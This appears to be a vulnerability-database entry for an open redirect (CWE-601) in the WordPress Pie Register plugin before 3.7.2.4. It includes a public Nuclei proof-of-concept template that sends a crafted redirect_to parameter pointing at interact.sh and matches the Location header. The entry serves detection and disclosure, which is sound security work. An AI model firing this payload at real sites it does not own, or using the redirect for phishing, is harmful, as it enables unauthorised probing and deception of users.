pieregister-open-redirect: WordPress Pie Register < 3.7.2.4 - Open Redirect

日期: 2025-08-01 | 影响软件: WordPress Pie Register | POC: 已公开

漏洞描述

WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function.

PoC代码[已公开]

id: pieregister-open-redirect

info:
  name: WordPress Pie Register < 3.7.2.4 - Open Redirect
  author: 0x_Akoko
  severity: low
  description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function.
  reference:
    - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4
    - https://wordpress.org/plugins/pie-register/
  classification:
    cwe-id: CWE-601
  metadata:
    max-request: 1
  tags: redirect,wp-plugin,pieregister,wpscan,wordpress,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 490a004630440220425a16b761d7fad06d43debe03b75d7ab5bc726c88bcf58c5b6411d45ccdf9d8022056b25ac6f81bfdc78c5fe4b3fdadc3ef0544b3bc5f8c1ae38049cb39789bd553:922c64590222798bb761d5b6d8e72950

相关漏洞推荐